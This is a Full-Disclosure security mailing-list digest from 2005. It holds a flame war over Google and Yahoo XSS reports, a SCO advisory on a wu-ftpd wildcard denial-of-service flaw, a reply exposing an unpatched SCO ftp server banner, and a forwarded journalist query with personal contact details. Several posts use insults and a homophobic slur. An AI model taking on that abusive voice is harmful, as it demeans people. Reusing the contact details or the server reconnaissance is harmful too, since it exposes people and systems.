> > -sk
>_______________________________________________
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/
>
>
>
>
>------------------------------
>
>Message: 10
>Date: Wed, 21 Dec 2005 18:39:31 +0100
>From: "GroundZero Security" <fd@....org>
>Subject: Re: [Full-disclosure] XSS vulnerabilities in Google.com
>To: "n3td3v" <xploitable@...il.com>
>Cc: full-disclosure@...ts.grok.org.uk
>Message-ID: <017701c60655$8263e750$0100a8c0@...learwinter>
>Content-Type: text/plain; charset="iso-8859-1"
>
>lol you wont ever give up kiddie dont you ?
>i do not care about google and yahoo vulnerabilities.
>i agree to leave you alone, but you ask for it again and again so be it.
>1 person said its ok for the xss vuln. you cant even count or did you see
>any
>other mails ? how about the tons of people the constantly tell you to shut
>the fuck up
>since we are all tired of you. you say the same shit over and over again.
>if someone tells you facts then you ignore it, because you have no other
>arguments as that
>someone else wouldnt have found lame xss bugs in google or yahoo and
>therefore they shouldnt
>be allowed on this list. you are the last person to even dare to say
>something like this.
>you have nothing else to say then that people would be jealous of you or
>how precious
>your lame xss bugs are. noone cares about your shitty vulnerabilities you
>found as it doesnt
>require any skill at all to find those. show us some code! how many
>exploits did you write ?
>you are so blinded by your ego that you dont realize how much crap you talk
>and how you
>destory your imaginary reputation yourself. why do you think there have
>been so many mails against you?
>its not because of your xss lameness. if you would have simply provided
>them to the list noone would have
>bothered, but you have to brag how special they would make you. then you
>think you would be one
>of the most respected security researchers out there, but noone knows you.
>you are so pathetic its unbeliveable.
>pull the stick out of your ass and get lost kid.
>
>----- Original Message -----
>From: "n3td3v" <xploitable@...il.com>
>To: "GroundZero Security" <fd@....org>; <full-disclosure@...ts.grok.org.uk>
>Sent: Wednesday, December 21, 2005 6:16 PM
>Subject: Re: [Full-disclosure] XSS vulnerabilities in Google.com
>
>
> > You trolled this thread by saying Watchfire should stop disclosing
> > vulnerabilities for Yahoo and Google. You get the response you
> > deserved to get. Now you're running off the thread now with your tail
> > between your legs, because everyone has told you that Google and Yahoo
> > vulnerabilities (especially XSS) will never be banned from FD.
> >
> >
> > On 12/21/05, GroundZero Security <fd@....org> wrote:
> > > yes you are right, but its like if noone tells him what a stupid fag
>he is,
> > > he will keep posting and posting his irrelevant crap and just ignore
>the tons of private
> > > mail he receives. i'm sorry for adding to the noise, but its just too
>tempting.
> > > i try to ignore it. but i cant promise i will, the last mail he sent
>just asks for a reply :P
> > > but ok...must...resist.....
> > > btw my name is not groundzero, thats my company :)
> > >
> > > greetz
> > > -sk
> >
>
>
>------------------------------
>
>Message: 11
>Date: Wed, 21 Dec 2005 18:47:42 +0100
>From: Peer Janssen <peer@...en-online.de>
>Subject: [Full-disclosure] Character vulnerabilities
>To: full-disclosure@...ts.grok.org.uk
>Message-ID: <43A9953E.4020502@...en-online.de>
>Content-Type: text/plain; charset=us-ascii; format=flowed
>
>Hi list,
>
>I read so many postings on this list of people who seemingly do not
>control their anger, fury etc. which seems to bump their heads straight
>at their ceilings.
>
>Do you really consider this as qualities of a security
>researcher/consultant/employee/...?
>
>I'd rather consider them vulnerabilities which might expose them to
>social engineering attacks or to being blinded by their own rage, which
>can easily result in destructive carelessness in many areas.
>
>I don't think that it makes a good publicity for a company to work with
>security people not mastering themselves. Why would you entrust them
>with your systems if they react so emotionally? Shouldn't they rather be
>clear-minded, rational, controlling themselves, etc., when dealing in
>any way with security issues?
>
>So please, do yourself and those around you a favor and change; you CAN
>do it, and you will make everybody happier, and youself more efficient,
>if happyness is not your thing.
>
>So cheer up, and take it a bit more easily!
>Peer
>
>
>
>------------------------------
>
>Message: 12
>Date: Wed, 21 Dec 2005 18:48:52 +0100
>From: fok yo <yoo.fok@...il.com>
>Subject: Re: [Full-disclosure] XSS vulnerabilities in Google.com
>To: n3td3v <xploitable@...il.com>
>Cc: full-disclosure@...ts.grok.org.uk
>Message-ID: <cd8f1f1e0512210948t3abdd6a8o@...l.gmail.com>
>Content-Type: text/plain; charset="iso-8859-1"
>
>You just don't get it, do you....
>The problem isn't xss bugs are the uberlamest, the problem is you reserve
>yourself the right to _spam_ us 24/7 by bragging about how once you found a
>half-ass xss yourself.
>Your signal to noise ratio is simply too low to be bearable.
>
>YOU HAVEN'T ADDED ANY *INTERESTING* SECURITY RELATED CONTENT TO THE LIST,
>EVER.
>YOU ARE USELESS TO THE SECURITY COMMUNITY AS A WHOLE.
>STOP REPLYING TO FD BECAUSE YOU ANNOY 99,99% OF US.
>WE DON'T NEED ANOTHER WANNABE.
>YOU WASTE OUR TIME.
>
>+ you are __very stupid__, you obviously lack the insight to be the top
>notch security pro you think you are, try something else, it's just not
>worth it, piece of fuckup.
>+ what's your real name? Stop hiding behind a nick and step into the
>ligths....
>+According to the way you express yourself through email (very simple
>language/grammar, especially for a native english speaker, bragging
>and trying to prove yourself without valid arguments, not going to the core
>of a discussion but trying to hide yourself after the image you think you
>created, ... ) , it's obvious you lack any social skills, stop wasting your
>time in front of the computer, find a date for new year's eve, coz it'll
>be cold and lonely.
>
>
>2005/12/21, n3td3v <xploitable@...il.com>:
> >
> > You trolled this thread by saying Watchfire should stop disclosing
> > vulnerabilities for Yahoo and Google. You get the response you
> > deserved to get. Now you're running off the thread now with your tail
> > between your legs, because everyone has told you that Google and Yahoo
> > vulnerabilities (especially XSS) will never be banned from FD.
> >
> >
> > On 12/21/05, GroundZero Security <fd@....org> wrote:
> > > yes you are right, but its like if noone tells him what a stupid fag
>he
> > is,
> > > he will keep posting and posting his irrelevant crap and just ignore
>the
> > tons of private
> > > mail he receives. i'm sorry for adding to the noise, but its just too
> > tempting.
> > > i try to ignore it. but i cant promise i will, the last mail he sent
> > just asks for a reply :P
> > > but ok...must...resist.....
> > > btw my name is not groundzero, thats my company :)
> > >
> > > greetz
> > > -sk
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
>-------------- next part --------------
>An HTML attachment was scrubbed...
>URL:
>http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20051221/3b9022b2/attachment-0001.html
>
>------------------------------
>
>Message: 13
>Date: Wed, 21 Dec 2005 11:54:05 -0600 (CST)
>From: "J.A. Terranson" <measl@....org>
>Subject: [Full-disclosure] [EMED-L] Patriot Act and HIPPA (fwd)
>To: Full-Disclosure <Full-Disclosure@...ts.grok.org.uk>
>Cc: antisocial@....org, "cypherpunks@...qaeda.net"
> <cypherpunks@...qaeda.net>
>Message-ID: <20051221115344.H37487@...r.zsa.bet>
>Content-Type: TEXT/PLAIN; charset=US-ASCII
>
>
>Take note people!
>
>--
>Yours,
>
>J.A. Terranson
>sysadmin@....org
>0xBD4A95BF
>
>
> Just once, can't we have a nice polite discussion about
> the logistics and planning side of large criminal enterprise?
>
> - Steve Thompson
>
>
>
>---------- Forwarded message ----------
>Date: Wed, 21 Dec 2005 12:10:59 -0500
>From: Jeanne Lenzer <jeanne.lenzer@...IL.COM>
>Reply-To: EMED-L -- a list for emergency medicine practitioners.
> <EMED-L@...SRV1.UCSF.EDU>
>To: EMED-L@...SRV1.UCSF.EDU
>Subject: [EMED-L] Patriot Act and HIPPA
>
>Could anyone on this listserve who has seen anything like what follows
>below, please contact me off-list immediately jeanne.lenzer@...thlink.net
>(for background or for attribution - your choice).
>
>Thanks, Jeanne
>
>
>
>A patient was handed a medical information rights and disclosure booklet
>she got from her doctor. It lists the folks that they might
>release medical information to for various reasons (health department,
>lawyers and courts because of subpoena, law enforcement officials,
>coroners,
>medical examiners, funeral directors, etc.).
>Below them, there is this graph:
>
>Protective Services for the President, National Security and Intelligence
>Activities:
>We may disclose medical information about you to authorized federal
>officials so they may without limitation (i) provide protection to the
>President, other authorized persons or foreign heads of state or conduct
>special investigations, or (ii) conduct lawful intelligence,
>counter-intelligence, or other national security activities authorized by
>law.
>
>
>
>
>
>__________
>
>
>
>Jeanne Lenzer
>
>Freelance journalist
>
>11 Len Court
>
>Kingston, NY 12401
>
>USA
>
>jeanne.lenzer@...thlink.net
>
>845.943.6202 office
>
>203.300.7136 cell
>
>
>
>To unsubscribe, send the command "SIGNOFF EMED-L" to
>LISTSERV@...SRV1.UCSF.EDU
>
>
>------------------------------
>
>Message: 14
>Date: Wed, 21 Dec 2005 18:57:18 +0100
>From: Slythers Bro <slythers@...il.com>
>Subject: Re: [Full-disclosure] Firewall (The Movie) -
> http://firewallmovie.warnerbros.com/cmp/trailer.html?id=trailer
>To: Dave McCormick <mccormic@...u.net>
>Cc: full-disclosure@...ts.grok.org.uk
>Message-ID:
> <8f6a58a30512210957v689c9804p373ec1febeef360d@...l.gmail.com>
>Content-Type: text/plain; charset="iso-8859-1"
>
>this movie seem to sux
>-------------- next part --------------
>An HTML attachment was scrubbed...
>URL:
>http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20051221/c9ae0fc4/attachment-0001.html
>
>------------------------------
>
>Message: 15
>Date: Wed, 21 Dec 2005 17:58:27 +0000
>From: n3td3v <xploitable@...il.com>
>Subject: Re: [Full-disclosure] XSS vulnerabilities in Google.com
>To: Edward Pearson <Ed@...tymail.co.uk>,
> full-disclosure@...ts.grok.org.uk
>Message-ID:
> <4b6ee9310512210958p1775afb9g15f059db7775a6e@...l.gmail.com>
>Content-Type: text/plain; charset=ISO-8859-1
>
>I release information about Yahoo and Google, I don't see how my name
>goes in the same list as GroundZero and InfoSecBOFH. All i'm doing is
>defending Yahoo and Google researchers from being told not to disclose
>vulnerabilities on FD, is that such a bad thing?
>
>On 12/21/05, Edward Pearson <Ed@...tymail.co.uk> wrote:
> > Why has this become a trolling?
> > "if noone tell him what a stupid fag he is"
> > Are we back at fucking middle school? Have we decended to the level of
> > 10 year olds??
> >
> > Ground Zero, I've seen your company website(s) and your products. All I
> > say is I think you have several very good resons to pay FUCKING close
> > attention to what is said on this list. Work it out.
> >
> > The only people who seem hell bent on ruining this list for everyone
> > are:
> > InfoSecBOFH
> > n3td3v
> > Ground Zero Security
> >
> > None of these people have anything to bring to the table.
> > Lets see at least one real vuln report/exploit from one of you, and then
> > the other two have to concentrate on growing up enough to not troll it
> > or make stupid pre-school comments.
> >
> > Come on guys!!! I'm beginning to thing that actually you're not bigger
> > than this...
> >
> > Ultimatly, if you've got problems with each other, do it on MSN, AIM,
> > IRC, USENET whatever, just not my inbox.
> >
> > Have a fucking excellent day.
> >
> > - Ed (BTW, Ground Zero's has my alais since 1995, now I see that this
> > chump is going round putting a black mark by it)
> >
> > -----Original Message-----e
> > From: full-disclosure-bounces@...ts.grok.org.uk
> > [mailto:full-disclosure-bounces@...ts.grok.org.uk] On Behalf Of n3td3v
> > Sent: 21 December 2005 17:17
> > To: GroundZero Security; full-disclosure@...ts.grok.org.uk
> > Subject: Re: [Full-disclosure] XSS vulnerabilities in Google.com
> >
> > You trolled this thread by saying Watchfire should stop disclosing
> > vulnerabilities for Yahoo and Google. You get the response you deserved
> > to get. Now you're running off the thread now with your tail between
> > your legs, because everyone has told you that Google and Yahoo
> > vulnerabilities (especially XSS) will never be banned from FD.
> >
> >
> > On 12/21/05, GroundZero Security <fd@....org> wrote:
> > > yes you are right, but its like if noone tells him what a stupid fag
> > > he is, he will keep posting and posting his irrelevant crap and just
> > > ignore the tons of private mail he receives. i'm sorry for adding to
> > the noise, but its just too tempting.
> > > i try to ignore it. but i cant promise i will, the last mail he sent
> > > just asks for a reply :P but ok...must...resist.....
> > > btw my name is not groundzero, thats my company :)
> > >
> > > greetz
> > > -sk
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
>
>
>------------------------------
>
>Message: 16
>Date: Wed, 21 Dec 2005 12:58:32 -0500
>From: "KF (lists)" <kf_lists@...italmunition.com>
>Subject: Re: [Full-disclosure] SCOSA-2005.63 OpenServer 5.0.6
> OpenServer 5.0.7 OpenServer 6.0.0 : wu-ftp Denial of Service
> Vulnerability
>To: full-disclosure@...ts.grok.org.uk
>Cc: security-announce@...t.sco.com
>Message-ID: <43A997C8.1090903@...italmunition.com>
>Content-Type: text/plain; charset=ISO-8859-1; format=flowed
>
>How about you retards upgrade your own production ftp servers before
>sending out an another wu advisory...
>
>Seriously.... how many years can you leave this box unpatched? Look like
>you JUST released yet an nother patch that you can apply to it...
>
>ftp ftpput.sco.com
>Connected to ftpput.sco.com.
>220 artemis FTP server (Version 2.1WU(1)) ready.
>Name (ftpput.sco.com:kfinisterre):
>
>-KF
>
>security@....com wrote:
>
> > -----BEGIN PGP SIGNED MESSAGE-----
> > Hash: SHA1
> >
> >
>______________________________________________________________________________
> >
> >
> > SCO Security Advisory
> >
> > Subject: OpenServer 5.0.6 OpenServer 5.0.7 OpenServer 6.0.0 :
> > wu-ftp Denial of Service Vulnerability
> > Advisory number: SCOSA-2005.63
> > Issue date: 2005 December 21
> > Cross reference: sr893936 fz532335 erg712856
> > sr895049 fz533027 erg712952
> > CVE-2005-0256
> >
>______________________________________________________________________________
> >
> >
> >
> > 1. Problem Description
> >
> > The wu_fnmatch function in wu_fnmatch.c allows remote attackers
> > to cause a denial of service (CPU exhaustion by recursion) via a
> > glob pattern with a large number of * (wildcard) characters, as
> > demonstrated using the dir command.
> >
> > The Common Vulnerabilities and Exposures project (cve.mitre.org)
> > has assigned the following name CVE-2005-0256 to this issue.
> >
> >
> > 2. Vulnerable Supported Versions
> >
> > System Binaries
> >
>----------------------------------------------------------------------
> >
> > OpenServer 5.0.6 /etc/ftpd
> > OpenServer 5.0.7 /etc/ftpd
> > OpenServer 6.0.0 /etc/ftpd
> >
> >
> > 3. Solution
> >
> > The proper solution is to install the latest packages.
> >
> >
> > 4. OpenServer 5.0.6
> >
> > 4.1 Location of Fixed Binaries
> >
> > ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2005.63
> >
> >
> > 4.2 Verification
> >
> > MD5 (p532335.506_vol.tar) = 89ea2ed1f88da6721bd73c3889f9ac0c
> >
> > md5 is available for download from
> > ftp://ftp.sco.com/pub/security/tools
> >
> >
> > 4.3 Installing Fixed Binaries
> >
> > The following package should be installed on your system before you
> > install this fix:
> >
> > OSS646C
> >
> > Upgrade the affected binaries with the following sequence:
> >
> > 1) Download p532335.506_vol.tar to a directory.
> >
> > 2) Extract VOL* files.
> >
> > # tar xvf p532335.506_vol.tar
> >
> > 3) Run the custom command, specify an install
> > from media images, and specify the directory as
> > the location of the images.
> >
> >
> > 5. OpenServer 5.0.7
> >
> > 5.1 Location of Fixed Binaries
> >
> > The fixes are only available in SCO OpenServer Release 5.0.7
> > Maintenance Pack 4 or later.
> >
> > ftp://ftp.sco.com/pub/openserver5/507/mp/osr507mp4/osr507mp4_vol.tar
> >
> >
> > 5.2 Verification
> >
> > MD5 (osr507mp4_vol.tar) = 4c87d840ff5b43221258547d19030228
> >
> > md5 is available for download from
> > ftp://ftp.sco.com/pub/security/tools
> >
> >
> > 5.3 Installing Fixed Binaries
> >
> > See the SCO OpenServer Release 5.0.7 Maintenance Pack 4 Release
> > and Installation Notes:
> >
> > ftp://ftp.sco.com/pub/openserver5/507/mp/osr507mp4/osr507mp4.htm
> >
> >
> > 6. OpenServer 6.0.0
> >
> > 6.1 Location of Fixed Binaries
> >
> > ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2005.63
> >
> >
> > 6.2 Verification
> >
> > MD5 (p533027.600_vol.tar) = d939cb729d115c9bef2d2032903f2125
> >
> > md5 is available for download from
> > ftp://ftp.sco.com/pub/security/tools
> >
> >
> > 6.3 Installing Fixed Binaries
> >
> > Upgrade the affected binaries with the following sequence:
> >
> > 1) Download p533027.600_vol.tar to a directory.
> >
> > 2) Extract VOL* files.
> >
> > # tar xvf p533027.600_vol.tar
> >
> > 3) Run the custom command, specify an install
> > from media images, and specify the directory as
> > the location of the images.
> >
> >
> > 7. References
> >
> > Specific references for this advisory:
> > http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0256
> >
> >
>http://www.idefense.com/application/poi/display?id=207&type=vulnerabilities
> >
> >
> > SCO security resources:
> > http://www.sco.com/support/security/index.html
> >
> > SCO security advisories via email
> > http://www.sco.com/support/forums/security.html
> >
> > This security fix closes SCO incidents sr893936 fz532335
> > erg712856 sr895049 fz533027 erg712952.
> >
> >
> > 8. Disclaimer
> >
> > SCO is not responsible for the misuse of any of the information
> > we provide on this website and/or through our security
> > advisories. Our advisories are a service to our customers
> > intended to promote secure installation and use of SCO
> > products.
> >
> >
> > 9. Acknowledgments
> >
> > SCO would like to thank Adam Zabrocki.
> >
> >
>______________________________________________________________________________
> >
> > -----BEGIN PGP SIGNATURE-----
> > Version: GnuPG v1.4.2 (UnixWare)
> >
> > iD8DBQFDqYDTaqoBO7ipriERAtzOAJ0ctD8xRYQrLkkgyHsMqCvfQdPBFQCeIgx7
> > xqqmzQCNiw6t+WtSL5rqo4E=
> > =ha4X
> > -----END PGP SIGNATURE-----
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
> >
> >
>
>
>
>------------------------------
>
>Message: 17
>Date: Wed, 21 Dec 2005 11:09:08 -0700
>From: "wilder_jeff Wilder" <wilder_jeff@....com>
>Subject: RE: [Full-disclosure] Character vulnerabilities
>To: peer@...en-online.de, full-disclosure@...ts.grok.org.uk
>Message-ID: <BAY106-F7F86FB6686789F08B721B94310@....gbl>
>Content-Type: text/plain; format=flowed
>
><begin applause>
>
> WOOO HOOOOO!!!!! I'll second that
>
></begin applause>
>
>
>
>
>-Jeff Wilder
>CISSP,CCE,C/EH
>
>
>
>-----BEGIN GEEK CODE BLOCK-----
> Version: 3.1
> GIT/CM/CS/O d- s:+ a C+++ UH++ P L++ E- w-- N+++ o-- K- w O- M--
> V-- PS+ PE- Y++ PGP++ t+ 5- X-- R* tv b++ DI++ D++
> G e* h--- r- y+++*
>------END GEEK CODE BLOCK------
>
>
>
>
>
> >From: Peer Janssen <peer@...en-online.de>
> >Reply-To: peer@...en-online.de
> >To: full-disclosure@...ts.grok.org.uk
> >Subject: [Full-disclosure] Character vulnerabilities
> >Date: Wed, 21 Dec 2005 18:47:42 +0100
> >MIME-Version: 1.0
> >Received: from lists.grok.org.uk ([195.184.125.51]) by
> >bay0-mc12-f11.bay0.hotmail.com with Microsoft SMTPSVC(6.0.3790.211); Wed,
> >21 Dec 2005 09:51:14 -0800
> >Received: from lists.grok.org.uk (localhost [127.0.0.1])by
> >lists.grok.org.uk (Postfix) with ESMTP id 2998311E1;Wed, 21 Dec 2005
> >17:47:48 +0000 (GMT)
> >Received: from moutng.kundenserver.de
> >(moutng.kundenserver.de[212.227.126.177])by lists.grok.org.uk (Postfix)
> >with ESMTP id A1AFA1035for <full-disclosure@...ts.grok.org.uk>;Wed, 21
>Dec
> >2005 17:47:33 +0000 (GMT)
> >Received: from [84.162.202.209] (helo=[192.168.0.4])by
> >mrelayeu.kundenserver.de (node=mrelayeu3) with ESMTP (Nemesis),id
> >0MKxQS-1Ep83p13dR-0000lC; Wed, 21 Dec 2005 18:47:33 +0100
> >X-Message-Info: JGTYoYF78jHTlqJP6fYdQM6aP3lvEevT7GTXFU12H84=
> >X-Original-To: full-disclosure@...ts.grok.org.uk
> >Delivered-To: full-disclosure@...ts.grok.org.uk
> >User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US;rv:1.7.8)
>Gecko/20050927
> >Debian/1.7.8-1sarge3
> >X-Accept-Language: de, de-de, en-us, en, fr, he, ar
> >X-Provags-ID: kundenserver.de
> >abuse@...denserver.delogin:45dff816f45a21d2ed442f6d1b2646c7
> >X-BeenThere: full-disclosure@...ts.grok.org.uk
> >X-Mailman-Version: 2.1.5
> >Precedence: list
> >List-Id: An unmoderated mailing list for the discussion of security
> >issues<full-disclosure.lists.grok.org.uk>
> >List-Unsubscribe:
> ><https://lists.grok.org.uk/mailman/listinfo/full-disclosure>,
> ><mailto:full-disclosure-request@...ts.grok.org.uk?subject=unsubscribe>
> >List-Archive: <http://lists.grok.org.uk/pipermail/full-disclosure>
> >List-Post: <mailto:full-disclosure@...ts.grok.org.uk>
> >List-Help:
><mailto:full-disclosure-request@...ts.grok.org.uk?subject=help>
> >List-Subscribe:
> ><https://lists.grok.org.uk/mailman/listinfo/full-disclosure>,
> ><mailto:full-disclosure-request@...ts.grok.org.uk?subject=subscribe>
> >Errors-To: full-disclosure-bounces@...ts.grok.org.uk
> >Return-Path: full-disclosure-bounces@...ts.grok.org.uk
> >X-OriginalArrivalTime: 21 Dec 2005 17:51:16.0430 (UTC)
> >FILETIME=[241ADEE0:01C60657]
> >
> >Hi list,
> >
> >I read so many postings on this list of people who seemingly do not
>control
> >their anger, fury etc. which seems to bump their heads straight at their
> >ceilings.
> >
> >Do you really consider this as qualities of a security
> >researcher/consultant/employee/...?
> >
> >I'd rather consider them vulnerabilities which might expose them to
>social
> >engineering attacks or to being blinded by their own rage, which can
>easily
> >result in destructive carelessness in many areas.
> >
> >I don't think that it makes a good publicity for a company to work with
> >security people not mastering themselves. Why would you entrust them with
> >your systems if they react so emotionally? Shouldn't they rather be
> >clear-minded, rational, controlling themselves, etc., when dealing in any
> >way with security issues?
> >
> >So please, do yourself and those around you a favor and change; you CAN
>do
> >it, and you will make everybody happier, and youself more efficient, if
> >happyness is not your thing.
> >
> >So cheer up, and take it a bit more easily!
> >Peer
> >
> >_______________________________________________
> >Full-Disclosure - We believe in it.
> >Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> >Hosted and sponsored by Secunia - http://secunia.com/
>
>
>
>
>------------------------------
>
>Message: 18
>Date: Wed, 21 Dec 2005 19:14:28 +0100
>From: "GroundZero Security" <fd@....org>
>Subject: Re: [Full-disclosure] XSS vulnerabilities in Google.com
>To: "Edward Pearson" <Ed@...tymail.co.uk>
>Cc: full-disclosure@...ts.grok.org.uk
>Message-ID: <019601c6065a$63bf69f0$0100a8c0@...learwinter>
>Content-Type: text/plain; charset="iso-8859-1"
>
>i did provide a real exploit before here and before you
>point the finger on others, we didnt see anything coming from you at all
>did we ?
>
>----- Original Message -----
>From: "Edward Pearson" <Ed@...tymail.co.uk>
>To: <full-disclosure@...ts.grok.org.uk>
>Sent: Wednesday, December 21, 2005 6:41 PM
>Subject: RE: [Full-disclosure] XSS vulnerabilities in Google.com
>
>
> > Why has this become a trolling?
> > "if noone tell him what a stupid fag he is"
> > Are we back at fucking middle school? Have we decended to the level of
> > 10 year olds??
> >
> > Ground Zero, I've seen your company website(s) and your products. All I
> > say is I think you have several very good resons to pay FUCKING close
> > attention to what is said on this list. Work it out.
> >
> > The only people who seem hell bent on ruining this list for everyone
> > are:
> > InfoSecBOFH
> > n3td3v
> > Ground Zero Security
> >
> > None of these people have anything to bring to the table.
> > Lets see at least one real vuln report/exploit from one of you, and then
> > the other two have to concentrate on growing up enough to not troll it
> > or make stupid pre-school comments.
> >
> > Come on guys!!! I'm beginning to thing that actually you're not bigger
> > than this...
> >
> > Ultimatly, if you've got problems with each other, do it on MSN, AIM,
> > IRC, USENET whatever, just not my inbox.
> >
> > Have a fucking excellent day.
> >
> > - Ed (BTW, Ground Zero's has my alais since 1995, now I see that this
> > chump is going round putting a black mark by it)
> >
> > -----Original Message-----e
> > From: full-disclosure-bounces@...ts.grok.org.uk
> > [mailto:full-disclosure-bounces@...ts.grok.org.uk] On Behalf Of n3td3v
> > Sent: 21 December 2005 17:17
> > To: GroundZero Security; full-disclosure@...ts.grok.org.uk
> > Subject: Re: [Full-disclosure] XSS vulnerabilities in Google.com
> >
> > You trolled this thread by saying Watchfire should stop disclosing
> > vulnerabilities for Yahoo and Google. You get the response you deserved
> > to get. Now you're running off the thread now with your tail between
> > your legs, because everyone has told you that Google and Yahoo
> > vulnerabilities (especially XSS) will never be banned from FD.
> >
> >
> > On 12/21/05, GroundZero Security <fd@....org> wrote:
> > > yes you are right, but its like if noone tells him what a stupid fag
> > > he is, he will keep posting and posting his irrelevant crap and just
> > > ignore the tons of private mail he receives. i'm sorry for adding to
> > the noise, but its just too tempting.
> > > i try to ignore it. but i cant promise i will, the last mail he sent
> > > just asks for a reply :P but ok...must...resist.....
> > > btw my name is not groundzero, thats my company :)
> > >
> > > greetz
> > > -sk
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
>
>
>------------------------------
>
>Message: 19
>Date: Wed, 21 Dec 2005 18:24:33 +0000
>From: n3td3v <xploitable@...il.com>
>Subject: Re: [Full-disclosure] XSS vulnerabilities in Google.com
>To: GroundZero Security <fd@....org>,
> full-disclosure@...ts.grok.org.uk
>Message-ID:
> <4b6ee9310512211024m31d67709mc40a53b89fb05923@...l.gmail.com>
>Content-Type: text/plain; charset=ISO-8859-1
>
>Its a disgrace that its come to people like GroundZero knocking
>others, I really do. You've never disclosed any vulnerabilities, yet
>you think you can tell other people not to post their own just because
>you so happen to think its lame. Pathetic.
>
>On 12/21/05, GroundZero Security <fd@....org> wrote:
> > i did provide a real exploit before here and before you
> > point the finger on others, we didnt see anything coming from you at all
>did we ?
>
>
>------------------------------
>
>_______________________________________________
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/
>
>End of Full-Disclosure Digest, Vol 10, Issue 70
>***********************************************
_________________________________________________________________
Spam filtresi ile vir?slere karsi en g?venilir koruma, MSN PC Koruma'dan
ge?er. http://www.msn.com.tr/security/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists